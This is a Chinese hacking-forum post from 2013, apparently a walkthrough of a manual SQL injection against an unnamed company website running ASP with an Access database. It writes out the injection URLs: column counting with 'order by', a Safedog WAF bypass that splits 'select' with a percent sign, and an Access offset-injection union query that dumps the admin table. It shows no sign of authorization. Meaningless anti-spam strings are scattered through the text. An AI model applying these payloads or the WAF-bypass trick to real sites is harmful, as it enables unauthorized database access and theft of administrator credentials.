中国网络渗透测试联盟
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
[打印本页]
作者:
admin
时间:
2013-3-8 21:49
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。
+ x7 r/ ^# _7 [1 s. o
$ w$ E' v4 @ o
S; o* d; t( D8 x" H* M+ t8 Z
顺手加个admin
8 c: \+ I; ^: g4 Y* B$ i
+ {6 U' O1 M& u; V" `; _1 T
+ T1 g! Z4 T# E% t$ g9 V0 O
默认后台。
% i& `! Y6 z/ c% j" A2 g3 ?; ?
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
0 r) n. X$ l: T3 a
( J4 q' J3 K( W. B
: n- p F# }7 Z$ P: z" j: u
0 }5 N& Z2 T( v
所以就不用御剑扫了,待会直接封IP。
( k, _7 l o9 T1 W
' h) a. z" Y% \% z: }3 c
用order by语句判断是否存在注入。
' N$ ^/ U8 X+ L# g
http://www.xxx.com
/product_show.asp?id=997 order by 1
! Q. k: ^7 D4 A. M ]: G
http://www.xxx.com
/product_show.asp?id=997 order by 100
4 H" @8 Z# B$ L1 v6 y
现在存在注入,经测试后发现是9个字段。
% h! i s/ A/ J3 `( {" j
5 x# e, k, y' F0 m7 G! J8 H$ v
接下来进行联合查询,猜是否存在admin表。
; B0 u, B* k5 A0 m3 s: d
http://www.xxx.com
/product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
7 }! q; N% X9 q( M7 M# M* `
3 G% m' _3 }3 [6 C! B9 `% v* u1 M
3 Z/ d( |. x8 l
4 B Z) V3 s# x) V6 _ L; x, |7 z
在select中间加个%,se%lect绕过安全狗。
4 F5 Y0 v# n3 Q
! D5 M) T7 B9 T: J. ^
; e& ~2 ?+ l7 J6 A
发现存在admin表,然后开始手工猜常用的字段。
I8 I) L# K4 \$ P8 T4 x* p# b
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
& {' P1 `; X. S& N$ g: d; X S$ v
- \. t8 K- _4 Q, \2 M" U
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
' P4 i c! I8 t5 V$ A
! D7 i; J3 |+ Z/ W# v8 A
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
( v' Y, ]: y/ Z$ |4 _
http://www.xxx.com
/product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
5 w# E( `2 B1 o/ z% ?2 W
好了,敏感内容出显了。
( W1 c F/ P( _4 a
% d# ~8 I4 Q; K9 U% n, q7 c
8 x( x# n; |7 I9 [* M) l: ]
3 s D) C/ F5 c
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2